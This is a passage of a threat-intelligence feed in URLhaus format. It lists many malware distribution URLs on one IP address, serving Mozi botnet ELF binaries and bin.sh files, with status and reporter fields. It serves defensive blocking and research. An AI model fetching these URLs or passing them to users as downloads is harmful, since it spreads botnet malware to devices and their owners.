UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961138","urlhaus_reference":"https://urlhaus.abuse.ch/url/961138/","url":"http://89.160.20.156:45432/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961139","urlhaus_reference":"https://urlhaus.abuse.ch/url/961139/","url":"http://89.160.20.156:49891/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961140","urlhaus_reference":"https://urlhaus.abuse.ch/url/961140/","url":"http://89.160.20.156:34334/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961135","urlhaus_reference":"https://urlhaus.abuse.ch/url/961135/","url":"http://89.160.20.156:42886/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961134","urlhaus_reference":"https://urlhaus.abuse.ch/url/961134/","url":"http://89.160.20.156:47096/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961132","urlhaus_reference":"https://urlhaus.abuse.ch/url/961132/","url":"http://89.160.20.156:48214/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961133","urlhaus_reference":"https://urlhaus.abuse.ch/url/961133/","url":"http://89.160.20.156:40478/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961130","urlhaus_reference":"https://urlhaus.abuse.ch/url/961130/","url":"http://89.160.20.156:37771/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961131","urlhaus_reference":"https://urlhaus.abuse.ch/url/961131/","url":"http://89.160.20.156:35513/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961129","urlhaus_reference":"https://urlhaus.abuse.ch/url/961129/","url":"http://89.160.20.156:53382/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:51:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961128","urlhaus_reference":"https://urlhaus.abuse.ch/url/961128/","url":"http://89.160.20.156:50336/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:50:17 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961124","urlhaus_reference":"https://urlhaus.abuse.ch/url/961124/","url":"http://89.160.20.156:34233/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961125","urlhaus_reference":"https://urlhaus.abuse.ch/url/961125/","url":"http://89.160.20.156:38392/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961126","urlhaus_reference":"https://urlhaus.abuse.ch/url/961126/","url":"http://89.160.20.156:52654/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961127","urlhaus_reference":"https://urlhaus.abuse.ch/url/961127/","url":"http://89.160.20.156:60203/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961123","urlhaus_reference":"https://urlhaus.abuse.ch/url/961123/","url":"http://89.160.20.156:48091/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961122","urlhaus_reference":"https://urlhaus.abuse.ch/url/961122/","url":"http://89.160.20.156:40783/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:49:41 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961121","urlhaus_reference":"https://urlhaus.abuse.ch/url/961121/","url":"http://89.160.20.156:52015/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961118","urlhaus_reference":"https://urlhaus.abuse.ch/url/961118/","url":"http://89.160.20.156:42987/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961119","urlhaus_reference":"https://urlhaus.abuse.ch/url/961119/","url":"http://89.160.20.156:53388/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961120","urlhaus_reference":"https://urlhaus.abuse.ch/url/961120/","url":"http://89.160.20.156:44124/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961115","urlhaus_reference":"https://urlhaus.abuse.ch/url/961115/","url":"http://89.160.20.156:33802/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961116","urlhaus_reference":"https://urlhaus.abuse.ch/url/961116/","url":"http://89.160.20.156:43806/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961117","urlhaus_reference":"https://urlhaus.abuse.ch/url/961117/","url":"http://89.160.20.156:52278/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961114","urlhaus_reference":"https://urlhaus.abuse.ch/url/961114/","url":"http://89.160.20.156:41202/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961113","urlhaus_reference":"https://urlhaus.abuse.ch/url/961113/","url":"http://89.160.20.156:35756/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961112","urlhaus_reference":"https://urlhaus.abuse.ch/url/961112/","url":"http://89.160.20.156:40569/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961111","urlhaus_reference":"https://urlhaus.abuse.ch/url/961111/","url":"http://89.160.20.156:47645/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961110","urlhaus_reference":"https://urlhaus.abuse.ch/url/961110/","url":"http://89.160.20.156:40023/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961109","urlhaus_reference":"https://urlhaus.abuse.ch/url/961109/","url":"http://89.160.20.156:53402/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:34:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961108","urlhaus_reference":"https://urlhaus.abuse.ch/url/961108/","url":"http://89.160.20.156:36316/bin.sh","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:29:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961107","urlhaus_reference":"https://urlhaus.abuse.ch/url/961107/","url":"http://89.160.20.156:48105/bin.sh","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:28:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961103","urlhaus_reference":"https://urlhaus.abuse.ch/url/961103/","url":"http://89.160.20.156:40017/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961104","urlhaus_reference":"https://urlhaus.abuse.ch/url/961104/","url":"http://89.160.20.156:41906/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961105","urlhaus_reference":"https://urlhaus.abuse.ch/url/961105/","url":"http://89.160.20.156:38607/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961106","urlhaus_reference":"https://urlhaus.abuse.ch/url/961106/","url":"http://89.160.20.156:59331/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961102","urlhaus_reference":"https://urlhaus.abuse.ch/url/961102/","url":"http://89.160.20.156:53932/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:20:24 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961101","urlhaus_reference":"https://urlhaus.abuse.ch/url/961101/","url":"http://89.160.20.156:58385/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961099","urlhaus_reference":"https://urlhaus.abuse.ch/url/961099/","url":"http://89.160.20.156:57010/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961100","urlhaus_reference":"https://urlhaus.abuse.ch/url/961100/","url":"http://89.160.20.156:59715/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961094","urlhaus_reference":"https://urlhaus.abuse.ch/url/961094/","url":"http://89.160.20.156:57052/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961095","urlhaus_reference":"https://urlhaus.abuse.ch/url/961095/","url":"http://89.160.20.156:60550/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961096","urlhaus_reference":"https://urlhaus.abuse.ch/url/961096/","url":"http://89.160.20.156:39684/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961097","urlhaus_reference":"https://urlhaus.abuse.ch/url/961097/","url":"http://89.160.20.156:43593/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961098","urlhaus_reference":"https://urlhaus.abuse.ch/url/961098/","url":"http://89.160.20.156:36066/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961093","urlhaus_reference":"https://urlhaus.abuse.ch/url/961093/","url":"http://89.160.20.156:35006/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:19:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961091","urlhaus_reference":"https://urlhaus.abuse.ch/url/961091/","url":"http://89.160.20.156:38184/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961092","urlhaus_reference":"https://urlhaus.abuse.ch/url/961092/","url":"http://89.160.20.156:59027/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961090","urlhaus_reference":"https://urlhaus.abuse.ch/url/961090/","url":"http://89.160.20.156:50639/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961086","urlhaus_reference":"https://urlhaus.abuse.ch/url/961086/","url":"http://89.160.20.156:33534/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961087","urlhaus_reference":"https://urlhaus.abuse.ch/url/961087/","url":"http://89.160.20.156:36316/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961088","urlhaus_reference":"https://urlhaus.abuse.ch/url/961088/","url":"http://89.160.20.156:47120/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961089","urlhaus_reference":"https://urlhaus.abuse.ch/url/961089/","url":"http://89.160.20.156:46287/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961085","urlhaus_reference":"https://urlhaus.abuse.ch/url/961085/","url":"http://89.160.20.156:39536/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:14:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961083","urlhaus_reference":"https://urlhaus.abuse.ch/url/961083/","url":"http://89.160.20.156:40689/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:07:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961084","urlhaus_reference":"https://urlhaus.abuse.ch/url/961084/","url":"http://89.160.20.156:51123/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:07:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961082","urlhaus_reference":"https://urlhaus.abuse.ch/url/961082/","url":"http://89.160.20.156:52540/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961081","urlhaus_reference":"https://urlhaus.abuse.ch/url/961081/","url":"http://89.160.20.156:56964/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961078","urlhaus_reference":"https://urlhaus.abuse.ch/url/961078/","url":"http://89.160.20.156:57120/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961079","urlhaus_reference":"https://urlhaus.abuse.ch/url/961079/","url":"http://89.160.20.156:44518/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961080","urlhaus_reference":"https://urlhaus.abuse.ch/url/961080/","url":"http://89.160.20.156:50389/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961077","urlhaus_reference":"https://urlhaus.abuse.ch/url/961077/","url":"http://89.160.20.156:34335/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961069","urlhaus_reference":"https://urlhaus.abuse.ch/url/961069/","url":"http://89.160.20.156:54865/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961070","urlhaus_reference":"https://urlhaus.abuse.ch/url/961070/","url":"http://89.160.20.156:50773/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961071","urlhaus_reference":"https://urlhaus.abuse.ch/url/961071/","url":"http://89.160.20.156:52005/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961072","urlhaus_reference":"https://urlhaus.abuse.ch/url/961072/","url":"http://89.160.20.156:56066/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961073","urlhaus_reference":"https://urlhaus.abuse.ch/url/961073/","url":"http://89.160.20.156:32915/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961074","urlhaus_reference":"https://urlhaus.abuse.ch/url/961074/","url":"http://89.160.20.156:43462/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961075","urlhaus_reference":"https://urlhaus.abuse.ch/url/961075/","url":"http://89.160.20.156:33291/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961076","urlhaus_reference":"https://urlhaus.abuse.ch/url/961076/","url":"http://89.160.20.156:1440/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961068","urlhaus_reference":"https://urlhaus.abuse.ch/url/961068/","url":"http://89.160.20.156:55907/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961066","urlhaus_reference":"https://urlhaus.abuse.ch/url/961066/","url":"http://89.160.20.156:33181/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961067","urlhaus_reference":"https://urlhaus.abuse.ch/url/961067/","url":"http://89.160.20.156:44691/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961059","urlhaus_reference":"https://urlhaus.abuse.ch/url/961059/","url":"http://89.160.20.156:55254/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961060","urlhaus_reference":"https://urlhaus.abuse.ch/url/961060/","url":"http://89.160.20.156:43010/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961061","urlhaus_reference":"https://urlhaus.abuse.ch/url/961061/","url":"http://89.160.20.156:37886/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961062","urlhaus_reference":"https://urlhaus.abuse.ch/url/961062/","url":"http://89.160.20.156:40153/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961063","urlhaus_reference":"https://urlhaus.abuse.ch/url/961063/","url":"http://89.160.20.156:34305/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961064","urlhaus_reference":"https://urlhaus.abuse.ch/url/961064/","url":"http://89.160.20.156:35653/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961065","urlhaus_reference":"https://urlhaus.abuse.ch/url/961065/","url":"http://89.160.20.156:48908/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961058","urlhaus_reference":"https://urlhaus.abuse.ch/url/961058/","url":"http://89.160.20.156:40035/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 17:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961055","urlhaus_reference":"https://urlhaus.abuse.ch/url/961055/","url":"http://89.160.20.156:54461/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961056","urlhaus_reference":"https://urlhaus.abuse.ch/url/961056/","url":"http://89.160.20.156:51991/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 17:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not 